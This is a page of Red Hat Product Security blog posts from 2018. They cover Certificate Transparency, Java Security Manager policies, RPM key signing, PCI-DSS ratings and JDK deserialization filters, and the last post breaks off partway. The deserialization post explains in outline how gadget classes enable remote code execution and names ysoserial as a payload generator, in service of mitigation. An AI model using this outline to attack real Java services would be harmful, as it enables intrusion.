Latest Posts

  • Join us in San Francisco at the 2018 Red Hat Summit

    Authored by: Christopher Robinson

    This year’s Red Hat Summit will be held on May 8-10 in beautiful San Francisco, USA. Product Security will be joining many Red Hat security experts in presenting and assisting subscribers and partners at the show. Here is a sneak peek at the more than 125 sessions that a security-minded attendee can see at Summit this year.

    Sessions

    Cloud Management and Automation

    S1181 - Automating security and compliance for hybrid environments
    S1467 - Live demonstration: Find it. Fix it. Before it breaks.
    S1104 - Distributed API Management in a Hybrid Cloud Environment

    Containers and OpenShift

    S1049 - Best practices for securing the container life cycle
    S1260 - Hitachi & Red Hat collaborate: container migration guide
    S1220 - Network Security for Apps on OpenShift
    S1225 - OpenShift for Operations
    S1778 - Security oriented OpenShift within regulated environments
    S1689 - Automating Openshift Secure Container Deployment at Experian

    Infrastructure Modernization & Optimization

    S1727 - Demystifying systemd
    S1741 - Deploying SELinux successfully in production environments
    S1329 - Operations Risk Remediation in Highly Secure Infrastructures
    S1515 - Path to success with your Identity Management deployment
    S1936 - Red Hat Satellite 6 power user tips and tricks
    S1907 - Satellite 6 Securing Linux lifecycle in the Public Sector
    S1931 - Security Enhanced Linux for Mere Mortals
    S1288 - Smarter Infrastructure Management with Satellite & Insights

    Middleware + Modern App Dev Security

    S1896 - Red Hat API Management Overview, Security Models and Roadmap
    S1863 - Red Hat Single Sign-On Present and Future
    S1045 - Securing Apps & Services with Red Hat Single-Sign On
    S2109 - Securing service mesh, micro services and modern applications with JWT
    S1189 - Mobile in a containers world

    Value of the Red Hat Subscription

    S1916 - Exploiting Modern Microarchitectures: Meltdown, Spectre, and other hardware security vulnerabilities in modern processors
    S2702 - The Value of a Red Hat Subscription

    Roadmaps & From the Office of the CTO

    S2502 - Charting new territories with Red Hat
    S9973 - Getting strategic about security
    S1017 - Red Hat Security Roadmap : It's a Lifestyle, Not a Product
    S1000 - Red Hat Security Roadmap for Hybrid Cloud
    S1890 - What's new in security for Red Hat OpenStack Platform?

    Instructor-Led Security Labs

    L1007, L1007R - A practical introduction to container security (3rd ed.)
    L1036 - Defend Yourself Using Built-in RHEL Security Technologies
    L1034, L1034R - Implementing Proactive Security and Compliance Automation
    L1051 - Linux Container Internals: Part 1
    L1052 - Linux Container Internals: Part 2
    L1019 - OpenShift + RHSSO = happy security teams and happy users
    L1106, L1106R - Practical OpenSCAP
    L1055 - Up and Running with Red Hat Identity Management

    Security Mini-Topic Sessions

    M1022 - A problem's not a problem, until it's a problem (Red Hat Insights)
    M1140 - Blockchain: How to identify good use cases
    M1087 - Monitor and automate infrastructure risk in 15 minutes or less

    Security Birds-of-a-Feather Sessions

    B1009 - Connecting the Power of Data Security and Privacy
    B1990 - Grafeas to gate your deployment pipeline
    B1046 - I'm a developer. What do I need to know about security?
    B1048 - Provenance and Deployment Policy
    B1062 - The Red Hat Security BoF - Ask us (most) anything
    B1036 - Virtualization: a study
    B2112 - Shift security left - and right - in the container lifecycle

    Security Panels

    P1757 - DevSecOps with disconnected OpenShift
    P1041 - Making IoT real across industries

    Security Workshops

    W1025 - Satellite and Insights Test-drive

    On top of the sessions, Red Hat Product Security will be there playing fun educational games like our Flawed and Branded card game and the famous GAME SHOW! GAME SHOW!

    No matter what your interest or specialty is, Red Hat Summit definitely has something for you. Come learn more about the security features and practices around our products! We're looking forward to seeing you there!

    Posted: 2018-04-23T14:30:00+00:00
  • Certificate Transparency and HTTPS

    Authored by: Kurt Seifried

    Google has announced that on April 30, 2018, Chrome will:

    “...require that all TLS server certificates issued after 30 April, 2018 be compliant with the Chromium CT Policy. After this date, when Chrome connects to a site serving a publicly-trusted certificate that is not compliant with the Chromium CT Policy, users will begin seeing a full page interstitial indicating their connection is not CT-compliant. Sub-resources served over https connections that are not CT-compliant will fail to load and will show an error in Chrome DevTools.”

    So what exactly does this mean, and why should one care?

    What is a CT policy?

    CT stands for “Certificate Transparency” and, in simple terms, means that all certificates for websites will need to be registered by the issuing Certificate Authority (CA) in at least two public Certificate Logs.

    When a CA issues a certificate, it now must make a public statement in a trusted database (the Certificate Log) that, at a certain date and time, it issued a certificate for some site. The reason is that, for more than a year, many different CAs have issued certificates for sites and names for which they shouldn’t have (like “localhost” or “1.2.3.”) or have issued certificates following fraudulent requests (e.g. people who are not BigBank asking for certificates for bigbank.example.com). By placing all requested certificates into these Certificate Logs, other groups, such as security researchers and companies, can monitor what is being issued and raise red flags as needed (e.g. if you see a certificate issued for your domain that you did not request).

    If you do not announce your certificates in these Certificate Logs, the Chrome web browser will generate an error page that the user must click through before going to the page they were trying to load, and if a page contains elements (e.g. from advertising networks) that are served from non CT-compliant domains, they will simply not be loaded.
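
    If you want to check whether the certificate a site currently serves already carries embedded SCTs (Signed Certificate Timestamps, one of the ways a certificate can satisfy CT), a reasonably recent openssl can show them. A minimal sketch, assuming OpenSSL 1.1.0 or later and using example.com as a placeholder host:

    $ openssl s_client -connect example.com:443 -servername example.com </dev/null 2>/dev/null \
        | openssl x509 -noout -text | grep -A 3 "CT Precertificate SCTs"

    Keep in mind that SCTs can also be delivered via a TLS extension or stapled OCSP, so an empty result here does not by itself prove the site is not CT-compliant.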

    Why is Google doing this?

    Well there are probably several reasons but the main ones are:

    1. As noted, several CAs have been discovered issuing certificates wrongly or fraudulently, putting Internet users at risk. This technical solution greatly reduces that risk, as wrongly or fraudulently issued certificates can be detected quickly.

    2. More importantly, this prepares for a major change coming to the Chrome web browser in July 2018, in which all HTTP websites will be labeled as “INSECURE”, which should significantly drive up the adoption of HTTPS. This adoption will, of course, result in a flood of new certificates which, combined with the oversight provided by Certificate Logs, should help to catch fraudulently or wrongly-obtained certificates.

    What should a web server operator do?

    The first step is to identify your web properties, both external facing and internal facing. Then it’s simply a matter of determining whether you:

    1. want the certificate for a website to show up in the Certificate Logs so that the Chrome web browser does not generate an error (e.g. your public-facing web sites will want this), or
    2. absolutely do not want that particular certificate to show up in the Certificate Logs (e.g. a sensitive internal host), and you’re willing to live with Chrome errors.

    Depending on how your certificates are issued, and who issued them, you may have some time before this becomes an issue (though if you are using a service that issues short-lived certificates, you will definitely be affected by this). Also please note that some certificate issuers, like Amazon’s AWS Certificate Manager, do allow you to opt out of reporting certificates to the Certificate Logs, a useful feature for certificates used on systems that are “internal” and that you do not want the world to know about.

    It should be noted that in the long term, option 2 (not reporting certificates to the Certificate Logs) will become increasingly problematic as it is possible that Google may simply have Chrome block them rather than generate an error. So, with that in mind, now is probably a good time to start determining how your security posture will change when all your HTTPS-based hosts are effectively being enumerated publicly. You will also need to determine what to do with any HTTP web sites, as they will start being labelled as “INSECURE” within the next few months, and you may need to deploy HTTPS for them, again resulting in them potentially showing up in the Certificate Logs.
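
    To get a sense of how much of your HTTPS estate is already publicly enumerable through the Certificate Logs, you can query a public log search service such as crt.sh. A minimal sketch (example.com is a placeholder, and the query and field names are those exposed by crt.sh at the time of writing):

    $ curl -s 'https://crt.sh/?q=%25.example.com&output=json' | jq -r '.[].name_value' | sort -u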

    Posted: 2018-04-17T15:00:01+00:00
  • Harden your JBoss EAP 7.1 Deployments with the Java Security Manager

    Authored by: Jason Shepherd

    Overview

    The Java Enterprise Edition (EE) 7 specification introduced a new feature which allows application developers to specify a Java Security Manager (JSM) policy for their Java EE applications, when deployed to a compliant Java EE Application Server such as JBoss Enterprise Application Platform (EAP) 7.1. Until now, writing JSM policies has been pretty tedious, and running with JSM was not recommended because it adversely affected performance. Now a new tool has been developed which allows the generation of a JSM policy for deployments running on JBoss EAP 7.1. It is possible that running with JSM enabled will still affect performance, but JEP 232 indicates the performance impact would be 10-15% (it is still recommended to test the impact per application).

    Why Run with the Java Security Manager Enabled?

    Running a JSM will not fully protect the server from malicious features of untrusted code. It does, however, offer another layer of protection which can help reduce the impact of serious security vulnerabilities, such as deserialization attacks. For example, most of the recent attacks against Jackson Databind rely on making a Socket connection to an attacker-controlled JNDI Server to load malicious code. This article provides information on how this issue potentially affects an application written for JBoss EAP 7.1. The Security Manager could block the socket creation, and potentially thwart the attack.

    How to generate a Java Security Manager Policy

    Prerequisites

    • Java EE EAR or WAR file to add policies to;
    • Targeting JBoss EAP 7.1 or later;
    • Comprehensive test plan which exercises every "normal" function of the application.

    If a comprehensive test plan isn't available, a policy could be generated in a production environment, as long as some extra disk space for logging is available and there is confidence the security of the application is not going to be compromised while generating policies.

    Setup 'Log Only' mode for the Security Manager

    JBoss EAP 7.1 added a new feature to its custom Security Manager that is enabled by setting the org.wildfly.security.manager.log-only System Property to true.

    For example, if running in stand-alone mode on Linux, enable the Security Manager and set the system property in the bin/standalone.conf file using:

    SECMGR="true"
    JAVA_OPTS="$JAVA_OPTS -Dorg.wildfly.security.manager.log-only=true"
    

    We'll also need to add some additional logging for the log-only property to work, so go ahead and adjust the logging categories to set org.wildfly.security.access to DEBUG, as per the documentation, e.g.:

    /subsystem=logging/logger=org.wildfly.security.access:add
    /subsystem=logging/logger=org.wildfly.security.access:write-attribute(name=level,value=DEBUG)
    

    Test the application to generate policy violations

    For this example we'll use the batch-processing quickstart. Follow the README to deploy the application and access it running on the application server at http://localhost:8080/batch-processing. Click the 'Generate a new file and start import job' button in the Web UI and notice some policy violations are logged to the $JBOSS_HOME/standalone/log/server.log file, for example:

    DEBUG [org.wildfly.security.access] (Batch Thread - 1) Permission check failed (permission "("java.util.PropertyPermission" "java.io.tmpdir" "read")" in code source 
    "(vfs:/content/batch-processing.war/WEB-INF/classes <no signer certificates>)" of "ModuleClassLoader for Module "deployment.batch-processing.war" from Service Module Loader")
    

    Generate a policy file for the application

    Checkout the source code for the wildfly-policygen project written by Red Hat Product Security.

    git clone git@github.com:jasinner/wildfly-policygen.git
    

    Set the location of the server.log file which contains the generated security violations in the build.gradle script, i.e.:

    task runScript (dependsOn: 'classes', type: JavaExec) {
        main = 'com.redhat.prodsec.eap.EntryPoint'
        classpath = sourceSets.main.runtimeClasspath
        args '/home/jshepher/products/eap/7.1.0/standalone/log/server.log'
    }
    

    Run wildfly-policygen using gradle, i.e.:

    gradle runScript
    

    A permissions.xml file should be generated in the current directory. Using the example application, the file is called batch-processing.war.permissions.xml. Copy that file to src/main/webapp/META-INF/permissions.xml, build, and redeploy the application, for example:

    cp batch-processing.war.permissions.xml $APP_HOME/src/main/webapp/META-INF/permissions.xml
    

    Where APP_HOME is an environment variable pointing to the batch-processing application's home directory.
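
    If you ever need to write or review such a policy by hand, the file follows the Java EE 7 permissions.xml schema. A minimal sketch that would grant only the property-read permission from the violation logged earlier (not the exact output of wildfly-policygen):

    cat > $APP_HOME/src/main/webapp/META-INF/permissions.xml <<'EOF'
    <?xml version="1.0" encoding="UTF-8"?>
    <permissions xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="7">
        <!-- grant only the permissions the application was observed to need -->
        <permission>
            <class-name>java.util.PropertyPermission</class-name>
            <name>java.io.tmpdir</name>
            <actions>read</actions>
        </permission>
    </permissions>
    EOF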

    Run with the security manager in enforcing mode

    Recall that we set the org.wildfly.security.manager.log-only system property in order to log permission violations. Remove that system property or set it to false in order to enforce the JSM policy that's been added to the deployment. Once that line has been changed or removed from bin/standalone.conf, restart the application server, build, and redeploy the application.

    JAVA_OPTS="$JAVA_OPTS -Dorg.wildfly.security.manager.log-only=false"
    

    Also go ahead and remove the extra logging category that was added previously using the CLI, e.g.:

    /subsystem=logging/logger=org.wildfly.security.access:remove
    

    This time there shouldn't be any permission violations logged in the server.log file. To verify the Security Manager is still enabled look for this message in the server.log file:

    INFO  [org.jboss.as] (MSC service thread 1-8) WFLYSRV0235: Security Manager is enabled
    

    Conclusion

    While the Java Security Manager will not prevent all security vulnerabilities possible against an application deployed to JBoss EAP 7.1, it does add another layer of protection, which could mitigate the impact of serious security vulnerabilities such as deserialization attacks against Jackson Databind. If running with the Security Manager enabled, be sure to check the impact on the performance of the application to make sure it's within acceptable limits. Finally, use of the wildfly-policygen tool is not officially supported by Red Hat; however, issues can be raised for the project on GitHub, or you can reach out to Red Hat Product Security for usage help by emailing secalert@redhat.com.

    Posted: 2018-03-14T13:30:00+00:00
  • Securing RPM signing keys

    Authored by: Huzaifa Sidhpurwala

    RPM Package Manager is the common method for deploying software packages to Red Hat Enterprise Linux, Fedora Project, and their derivative Linux operating systems. These packages are generally signed using an OpenPGP key, implementing a cryptographic integrity check that enables the recipient to verify that no modifications occurred after the package was signed (assuming the recipient has a copy of the sender’s public key). This model assumes that the signer has secured the RPM signing private keys and that they will not be accessible to a powerful adversary.

    Before looking into possible solutions to the problem of securing RPM-signing keys, it’s worth mentioning that signing RPMs is not a complete solution. When using yum repositories, transport security (HTTPS) needs to be enabled to ensure that RPM packages, and the associated metadata (which contains package checksums, timestamps, dependency information, etc.), are transmitted securely. Lastly, sysadmins should always ensure that packages are installed from trusted repositories.

    How RPM signing works

    The rpm file format is a binary format and broadly consists of 4 sections:
    - the legacy lead is a 96 byte header which contains "magic numbers" (used to identify file type) and other data;
    - an optional signature section;
    - a header which is an index containing information about the RPM package file; and
    - the cpio archive of the actual files to be written to the filesystem.

    During the signing process, GnuPG calculates a signature from the header and the cpio section using the private key. This OpenPGP signature is stored in the optional signature section of the RPM file.

    Diagram depicting that the header and payload of the RPM are signed and that the signature is also stored in the RPM.

    During verification, GnuPG uses the public key to verify the integrity of both these sections.

    Diagram showing the process for verifying the header and payload of an RPM.

    The above is normally referred to as RPM v3 signatures. RPM version 4 and above introduce v4 signatures which are calculated on the header alone. The file contents are hashed and those hashes are protected by the header-only signature, so the payload can be validated without actually having a signature on it.
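
    To see which of these signatures and digests a particular package actually carries, you can ask rpm to verify it verbosely. A minimal sketch (the package path and key ID are placeholders, and the exact lines vary with the rpm version and how the package was signed):

    $ rpm -Kv ./package.rpm
    ./package.rpm:
        Header V3 RSA/SHA256 Signature, key ID <keyid>: OK
        Header SHA1 digest: OK
        V3 RSA/SHA256 Signature, key ID <keyid>: OK
        MD5 digest: OK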

    How to sign rpms

    The RPM binary internally uses OpenPGP, which has been traditionally used for signing emails. The process involves creating a key pair using OpenPGP and then using the private key to sign the RPMs while the public key is published securely to enable users to verify the integrity of the binary RPMs after downloading them.
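
    In practice, the workflow with the stock rpm tooling looks roughly like the following. This is a minimal sketch; the key name, e-mail address, and package path are placeholders:

    # generate an OpenPGP key pair (ideally on a dedicated, offline signing host)
    $ gpg --gen-key

    # tell rpm which key to sign with
    $ echo '%_gpg_name Package Signer <signer@example.com>' >> ~/.rpmmacros

    # sign the package, then verify the signature
    $ rpmsign --addsign package.rpm
    $ rpm -K package.rpm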

    Currently there is no way to directly sign RPMs using x509 certificates. If you really want to use x509 certificates, you can sign RPMs like any other file: sign the entire RPM file using openssl, nss, or any other x509 tool, and then distribute the signature and the certificate you want to verify against along with the RPM file.

    Using a Hardware Security Module

    A Hardware Security Module (HSM) is a physical computing device which can manage and safeguard digital keys. HSMs also provide cryptographic processing such as key generation, signing, encryption, and decryption. Various HSM devices are available on the market, with varying features and costs. Several are now available as USB sticks; once one is plugged in, GnuPG can recognize it, generate new keys on the device, and sign and verify files using the on-device private keys.

    Typically, keys are generated inside the HSM where they are then stored. The HSM is then installed on specially configured systems which are used for signing RPMs. These systems may be disconnected from the Internet to ensure additional security. Even if the HSM is stolen, it may not be possible to extract the private key from the HSM.

    With time HSM devices have become cheaper and more easily available.

    Securely publishing public keys

    While the conventional method of publishing OpenPGP public keys on HTTPS-protected websites exists, DNS, secured with DNSSEC, provides an elegant solution for further protecting the integrity of the published public keys.

    PKA (Public Key Association) is a simple way of storing the lookup information for your public key in a DNS TXT record. The record can hold the fingerprint of the public key as well as the location from which the full key can be retrieved, and the DNS records can further be signed with DNSSEC to provide additional assurance.
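
    As an illustration, a PKA record is published as a TXT record under the _pka subdomain for the mail-address-like user ID of the key. A minimal sketch of looking one up (the user, domain, and URL are hypothetical):

    $ dig +short TXT security._pka.example.com
    # expected answer, roughly:
    # "v=pka1;fpr=<full key fingerprint>;uri=https://example.com/keys/security.asc"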

    All RPMs released by Red Hat are signed, and the public keys are distributed with the products and also published online.

    Posted: 2018-03-07T14:30:00+00:00
  • Let's talk about PCI-DSS

    Authored by: Langley Rock

    For those who aren’t familiar with the Payment Card Industry Data Security Standard (PCI-DSS), it is the standard that is intended to protect our credit card data as it flows between systems and is stored in company databases. PCI-DSS requires that all vulnerabilities with a CVSS score of 4.0 or higher be addressed by PCI-DSS-compliant organizations (notably, those which process and/or store cardholder data). While this was done with the best of intentions, it has had an impact on many organizations’ capability to remediate these vulnerabilities in their environments.

    The qualitative severity ratings of vulnerabilities as categorized by Red Hat Product Security do not directly align with the baseline ratings recommended by CVSS, and it is these CVSS scores and ratings that are used by PCI-DSS and most scanning tools. As a result, there may be cases where a vulnerability rated as low severity by Red Hat exceeds the CVSS threshold recommended for PCI-DSS.

    Red Hat has published guidelines on vulnerability classification. Red Hat Product Security prioritizes security flaw remediation on Critical and Important vulnerabilities, those which pose the greatest risk to confidentiality, integrity, and/or availability. This is not intended to downplay the importance of lower severity vulnerabilities, but rather aims to target those risks which are seen as most important by our customers and industry at large. CVSS ratings for vulnerabilities build upon a set of worst-case assumptions (the CVSS calculator leaves all Temporal and Environmental factors set to “undefined”), describing an environment that has no security mitigations or compensating controls in place, which might not be an accurate representation of your environment. Specifically, a given flaw may be less significant in your application depending on how the function is used, whether it is exposed to untrusted data, or whether it enforces a privilege boundary. It is Red Hat’s position that base CVSS scores alone cannot reliably be used to fully capture the importance of flaws in every use case.

    In most cases, security issues will be addressed when updates are available upstream. However, as noted above, there may be cases where a vulnerability rated as low severity by Red Hat exceeds the CVSS threshold for vulnerability mitigation set by the PCI-DSS standard and is considered actionable by a security scanner or during an audit by a Qualified Security Assessor (QSA).

    In light of the above, Red Hat does not claim any of its products meet PCI-DSS compliance requirements. We do strive to provide secure software solutions and guidance to help remediate vulnerabilities of notable importance to our customers.

    When there is a discrepancy in the security flaw ratings, we suggest the following:

    • Harden your system: Determine if the component is needed or used. In many cases, scans will pick up on packages which are included in the distribution but do not need to be deployed in the production environment. If customers can remove these packages, or replace with another unaffected package, without impacting their functional system, they reduce the attack surface and reduce the number of components which might be targeted.

    • Validate the application: Determine if the situation is a false positive. (Red Hat often backports fixes which may result in false positives for version-detecting scanning products).

    • Self-evaluate the severity: Update the base CVSS score by calculating the environmental factors that are relevant, document the updated CVSS score for the vulnerability respective to your environment. All CVSS vector strings in our CVE pages link to the CVSS calculator on FIRST's website, with the base score pre-populated so that customers just need to fill in their other metrics.

    • Implement other controls to limit (or eliminate) exposure of the vulnerable interface or system.

    Further technical information to make these determinations can often be found from product support, in the various technical articles and blogs Red Hat makes available, in CVE pages’ Statement or Mitigation sections and in Bugzilla tickets. Customers with support agreements can reach out to product support for additional assistance to evaluate the potential risk for their environment, and confirm if the vulnerability jeopardizes the confidentiality of PCI-DSS data.

    Red Hat recognizes that vulnerability scores and impacts may differ across environments; these ratings are there to help you assess your own. As a customer, you can open a support case and give us the feedback that matters to you. Our support and product teams value this feedback and will use it to provide better results.

    Posted: 2018-02-28T14:30:00+00:00
  • JDK approach to address deserialization Vulnerability

    Authored by: Hooman Broujerdi

    Java deserialization of untrusted data has been a security buzzword for the past couple of years, with almost every application that uses the native Java serialization framework being vulnerable to Java deserialization attacks. Since its inception, there have been many scattered attempts to come up with a solution that best addresses this flaw. This article focuses on the Java deserialization vulnerability and explains how Oracle provides a mitigation framework in its latest Java Development Kit (JDK) versions.

    Background

    Let's begin by reviewing the Java deserialization process. Java Serialization Framework is JDK's built-in utility that allows Java objects to be converted into byte representation of the object and vice versa. The process of converting Java objects into their binary form is called serialization and the process of reading binary data to construct a Java object is called deserialization. In any enterprise environment the ability to save or retrieve the state of the object is a critical factor in building reliable distributed systems. For instance, a JMS message may be serialized to a stream of bytes and sent over the wire to a JMS destination. A RESTful client application may serialize an OAuth token to disk for future verification. Java's Remote Method Invocation (RMI) uses serialization under the hood to pass objects between JVMs. These are just some of the use cases where Java serialization is used.

    Inspecting the Flow

    When the application code triggers the deserialization process, ObjectInputStream will be initialized to construct the object from the stream of bytes. ObjectInputStream ensures the object graph that has been serialized is recovered. During this process, ObjectInputStream matches the stream of bytes against the classes that are available in the JVM's classpath.

    So, what is the problem?

    During the deserialization process, when readObject() takes the byte stream to reconstruct the object, it looks for the magic bytes relevant to the object type that has been written to the serialization stream, to determine what object type (e.g. enum, array, String, etc.) it needs to resolve the byte stream to. If the byte stream cannot be resolved to one of these types, it will be resolved to an ordinary object (TC_OBJECT), and finally the local class for that ObjectStreamClass will be retrieved from the JVM’s classpath. If the class is not found, an InvalidClassException will be thrown.

    The problem arises when readObject() is presented with a byte stream that has been manipulated to leverage classes that have a high chance of being available in the JVM’s classpath, also known as gadget classes, and that are vulnerable to Remote Code Execution (RCE). A number of classes have been identified as vulnerable to RCE so far, and research is still ongoing to discover more such classes. Now you might ask, how can these classes be used for RCE? Depending on the nature of the class, the attack is materialized by constructing the state of that particular class with a malicious payload, which is serialized and fed in at the point where serialized data is exchanged (i.e. the stream source) in the above workflow. This tricks the JDK into believing this is a trusted byte stream, and it will be deserialized by initializing the class with the payload. Depending on the payload, this can have disastrous consequences.

    Diagram: JVM vulnerable classes.

    Of course, the challenge for the adversary is to be able to access the stream source for this purpose, the details of which are outside the scope of this article. A good tool to review for further information on the subject is ysoserial, which is arguably the best tool for generating payloads.

    How to mitigate against deserialization?

    Loosely speaking, mitigation against a deserialization vulnerability is accomplished by implementing a LookAheadObjectInputStream strategy: the implementation subclasses the existing ObjectInputStream and overrides the resolveClass() method to verify whether a class is allowed to be loaded. This approach appears to be an effective way of hardening against deserialization and usually comes in two implementation flavors: whitelist or blacklist. A whitelist implementation only allows the acceptable business classes to be deserialized and blocks all other classes. A blacklist implementation, on the other hand, holds a set of well-known vulnerable classes and blocks them from being deserialized.

    Both whitelists and blacklists have their own pros and cons; however, a whitelist-based implementation proves to be the better way to mitigate a deserialization flaw. It effectively follows the principle of checking input against known-good values, which has always been part of good security practice. A blacklist-based implementation, on the other hand, relies heavily on intelligence gathered about which classes are vulnerable and on gradually adding them to the list, which is easy to miss or bypass.

    protected Class<?> resolveClass(ObjectStreamClass desc)
                    throws IOException, ClassNotFoundException {
          String name = desc.getName();

          // blacklist flavor: refuse classes known to be dangerous
          if (isBlacklisted(name)) {
                  throw new SecurityException("Deserialization is blocked for security reasons");
          }

          // whitelist flavor: refuse anything that is not an expected business class
          if (!isWhitelisted(name)) {
                  throw new SecurityException("Deserialization is blocked for security reasons");
          }

          return super.resolveClass(desc);
    }
    

    JDK's new Deserialization Filtering

    Although ad hoc implementations exist to harden against a deserialization flaw, the official specification on how to deal with this issue is still lacking. To address this issue, Oracle has recently introduced serialization filtering to improve the security of deserialization of data which seems to have incorporated both whitelist and blacklist scenarios. The new deserialization filtering is targeted for JDK 9, however it has been backported to some of the older versions of JDK as well.

    The core mechanism of deserialization filtering is based on an ObjectInputFilter interface which provides a configuration capability so that incoming data streams can be validated during the deserialization process. The status check on the incoming stream is determined by Status.ALLOWED, Status.REJECTED, or Status.UNDECIDED arguments of an enum type within ObjectInputFilter interface. These arguments can be configured depending on the deserialization scenarios, for instance if the intention is to blacklist a class then the argument will return Status.REJECTED for that specific class and allows the rest to be deserialized by returning the Status.UNDECIDED. On the other hand if the intention of the scenario is to whitelist then Status.ALLOWED argument can be returned for classes that match the expected business classes. In addition to that, the filter also allows access to some other information for the incoming deserializing stream, such as the number of array elements when deserializing an array of class (arrayLength), the depth of each nested objects (depth), the current number of object references (references), and the current number of bytes consumed (streamBytes). This information provides more fine-grained assertion points on the incoming stream and return the relevant status that reflects each specific use cases.

    Ways to configure the Filter

    JDK 9 filtering supports 3 ways of configuring the filter: custom filter, process-wide filter also known as global filter, and built-in filters for the RMI registry and Distributed Garbage Collection (DGC) usage.

    Case-based Filters

    The configuration scenario for a custom filter occurs when a deserialization requirement is different from any other deserialization process throughout the application. In this use case a custom filter can be created by implementing the ObjectInputFilter interface and override the checkInput(FilterInfo filterInfo) method.

    static class VehicleFilter implements ObjectInputFilter {
            final Class<?> clazz = Vehicle.class;
            final long arrayLength = -1L;
            final long totalObjectRefs = 1L;
            final long depth = 1L;
            final long streamBytes = 95L;
    
            public Status checkInput(FilterInfo filterInfo) {
                if (filterInfo.arrayLength() < this.arrayLength || filterInfo.arrayLength() > this.arrayLength
                        || filterInfo.references() < this.totalObjectRefs || filterInfo.references() > this.totalObjectRefs
                        || filterInfo.depth() < this.depth || filterInfo.depth() > this.depth || filterInfo.streamBytes() < this.streamBytes
                        || filterInfo.streamBytes() > this.streamBytes) {
                    return Status.REJECTED;
                }
    
                if (filterInfo.serialClass() == null) {
                    return Status.UNDECIDED;
                }
    
                if (filterInfo.serialClass() != null && filterInfo.serialClass() == this.clazz) {
                    return Status.ALLOWED;
                } else {
                    return Status.REJECTED;
                }
            }
        }
    

    JDK 9 has added two methods to the ObjectInputStream class allowing the above filter to be set/get for the current ObjectInputStream:

    public class ObjectInputStream
        extends InputStream implements ObjectInput, ObjectStreamConstants {
    
        private ObjectInputFilter serialFilter;
        ...
        public final ObjectInputFilter getObjectInputFilter() {
            return serialFilter;
        }
    
        public final void setObjectInputFilter(ObjectInputFilter filter) {
            ...
            this.serialFilter = filter;
        }
        ...
    } 
    

    In contrast to JDK 9, the latest JDK 8 (1.8.0_144) currently appears to only allow the filter to be set via ObjectInputFilter.Config.setObjectInputFilter(ois, new VehicleFilter());.

    Process-wide (Global) Filters

    A process-wide filter can be configured by setting jdk.serialFilter as either a system property or a security property. If the system property is defined, it is used to configure the filter; otherwise the filter checks the security property (i.e. jdk1.8.0_144/jre/lib/security/java.security) for its configuration.
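
    For example, a process-wide filter can be supplied on the command line when launching the JVM. A minimal sketch (the limits, package name, and application jar are placeholders; the pattern syntax is described below):

    $ java -Djdk.serialFilter='maxdepth=10;maxbytes=1048576;org.example.**;!*' -jar application.jar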

    The value of jdk.serialFilter is configured as a sequence of patterns, either matching against class names or setting limits on properties of the incoming byte stream. Patterns are separated by semicolons, and whitespace is considered part of a pattern. Limits are checked before classes, regardless of the order in which the pattern sequence is configured. Below are the limit properties which can be used during configuration:

    - maxdepth=value // the maximum depth of a graph
    - maxrefs=value // the maximum number of the internal references
    - maxbytes=value // the maximum number of bytes in the input stream
    - maxarray=value // the maximum array size allowed
    

    Other patterns match the class or package name as returned by Class.getName(). Class and package patterns accept the asterisk (*), double asterisk (**), period (.), and forward slash (/) symbols. Below are a couple of pattern scenarios that could possibly happen:

    // this matches a specific class and rejects the rest
    "jdk.serialFilter=org.example.Vehicle;!*"

    // this matches all classes in the package and all subpackages and rejects the rest
    "jdk.serialFilter=org.example.**;!*"

    // this matches all classes in the package and rejects the rest
    "jdk.serialFilter=org.example.*;!*"

    // this matches any class with the pattern as a prefix
    "jdk.serialFilter=org.example*"
    

    Built-in Filters

    JDK 9 also introduces additional built-in, configurable filters, mainly for the RMI Registry and Distributed Garbage Collection (DGC). The built-in filters for the RMI Registry and DGC white-list classes that are expected to be used by these services. Below are the whitelisted classes for both RMIRegistryImpl and DGCImpl:

    RMIRegistryImpl

    java.lang.Number
    java.rmi.Remote
    java.lang.reflect.Proxy
    sun.rmi.server.UnicastRef
    sun.rmi.server.RMIClientSocketFactory
    sun.rmi.server.RMIServerSocketFactory
    java.rmi.activation.ActivationID
    java.rmi.server.UID
    

    DGCImpl

    java.rmi.server.ObjID
    java.rmi.server.UID
    java.rmi.dgc.VMID
    java.rmi.dgc.Lease
    

    In addition to these classes, users can also add their own customized filters using sun.rmi.registry.registryFilter and sun.rmi.transport.dgcFilter system or security properties with the property pattern syntax as described in previous section.

    Wrapping up

    While Java deserialization is not a vulnerability itself, deserialization of untrusted data using the JDK’s native serialization framework is. It is important to differentiate between the two, as the latter is introduced by bad application design rather than being a flaw in the framework itself. The Java deserialization framework prior to JEP 290, however, did not have any validation mechanism to verify the legitimacy of the objects. While there are a number of ways to mitigate the JDK’s lack of assertion on deserialized objects, there is no concrete specification to deal with this flaw within the JDK itself. With JEP 290, Oracle introduced a new filtering mechanism that allows developers to configure filters for a number of deserialization scenarios. The new filtering mechanism should make it easier to mitigate deserialization of untrusted data should the need arise.

    Posted: 2018-02-21T14:30:00+00:00
  • Smart card forwarding with Fedora

    Authored by: Daiki Ueno

    Smart cards and hardware security modules (HSM) are technologies used to keep private keys secure on devices physically isolated from other devices while allowing access only to an authorized user. That way only the intended user can use that device to authenticate, authorize, or perform other functions that involve the private keys while others are prevented from gaining access. These devices usually come in the form of a USB device or token which is plugged into the local computer.

    In modern "cloud" computing, it is often desirable to use such a device like a smart card on remote servers. For example, one can sign software or documents on a remote server, use the local smart card to authenticate to Kerberos, or other possible uses.

    There are various approaches to tackle the problem of using a local smart card on a remote system, and on different levels of the smart card application stack. It is possible to forward the USB device holding the smart card, or forward the lower-level PC/SC protocol which some smart cards talk, or forward the high-level interface used to communicate with smart cards, the PKCS#11 interface. It is also possible to forward between systems one’s OpenPGP keys via GnuPG by using gpg-agent, or one’s SSH keys via ssh-agent. While these are very useful approaches when we are restricted to one particular set of keys, or a single application, they fail to provide a generic smart card or forwarding mechanism.

    Hence, in Fedora, we followed the approach of forwarding the higher level smart card interface, PKCS#11, as it provides the following advantages:

    • Unlike USB forwarding it does not require administrator access on the remote system, nor any special interaction with the remote system’s kernel.
    • It can be used to forward more than just smart cards, that is, a Trusted Platform Module (TPM) chip or any HSM can also be forwarded over the PKCS#11 interface.
    • Unlike any application-specific key forwarding mechanism, it forwards the whole feature set of the card, allowing it to access items like X.509 certificates, secret keys, and others.

    In the following sections we describe the approach and tools needed to perform that forwarding over SSH secure communication channels.

    Scenario

    We assume having a local workstation, and a remote server. On the local computer we have inserted a smart card (in our examples we will use a Nitrokey card, which works very well with the OpenSC drivers). We will forward the card from the workstation to the remote server and demonstrate various operations with the private key on the card.

    Installing required packages

